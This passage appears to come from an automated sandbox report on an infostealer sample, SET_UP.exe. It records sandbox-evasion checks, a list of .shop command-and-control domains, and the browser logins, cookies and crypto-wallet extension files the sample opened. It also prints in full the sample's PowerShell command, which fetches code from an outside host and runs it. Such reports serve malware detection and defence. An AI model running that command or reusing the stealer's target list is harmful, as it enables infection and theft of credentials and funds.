              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: SET_UP.exe | Static file information: File size 75071589 > 1048576
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2064103815.0000000007690000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb&/^s& source: powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZa source: powershell.exe, 00000004.00000002.2064442184.0000000007710000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.2064103815.00000000076A6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbM1 source: powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Users\user\Desktop\SET_UP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
              Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_3_00930336 push edi; retf 0_3_00930349
              Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_3_0091F589 push ebp; iretd 0_3_0091F58A
              Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_3_0091F539 push eax; iretd 0_3_0091F53A
              Source: C:\Users\user\Desktop\SET_UP.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SET_UP.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\SET_UP.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SET_UP.exe | System information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4732
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2266
              Source: C:\Users\user\Desktop\SET_UP.exe TID: 7496 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\SET_UP.exe TID: 7516 | Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7700 | Thread sleep count: 4732 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704 | Thread sleep count: 2266 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748 | Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\SET_UP.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
              Source: C:\Users\user\Desktop\SET_UP.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
              Source: C:\Users\user\Desktop\SET_UP.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.2033069300.00000000008BB000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2032439542.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2035351543.0000000000902000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: SET_UP.exe, 00000000.00000003.2033069300.00000000008E5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW^
              Source: powershell.exe, 00000004.00000002.2053647894.000000000305A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\SET_UP.exe | Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: cloudewahsj.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: rabidcowse.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: noisycuttej.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: tirepublicerj.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: framekgirus.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: wholersorie.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: abruptyopsn.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: nearycrepso.shop
              Source: SET_UP.exe, 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: skinfuzzerz.cyou
              Source: C:\Users\user\Desktop\SET_UP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
              Source: C:\Users\user\Desktop\SET_UP.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\SET_UP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\SET_UP.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: SET_UP.exe PID: 7268, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: SET_UP.exe, 00000000.00000003.1947405272.0000000000950000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ppdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":01r"|:
              Source: SET_UP.exe, 00000000.00000002.2035748954.000000000095B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s/ElectronCash
              Source: SET_UP.exe | String found in binary or memory: Jaxx Liberty
              Source: SET_UP.exe, 00000000.00000003.1947405272.0000000000950000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\c
              Source: SET_UP.exe, 00000000.00000003.1988519960.0000000000919000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: SET_UP.exe, 00000000.00000003.1976169185.0000000000949000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
              Source: SET_UP.exe, 00000000.00000003.1947405272.0000000000950000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["
              Source: SET_UP.exe, 00000000.00000003.1988905738.0000000000957000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: SET_UP.exe, 00000000.00000003.1988338849.000000000094D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\SET_UP.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
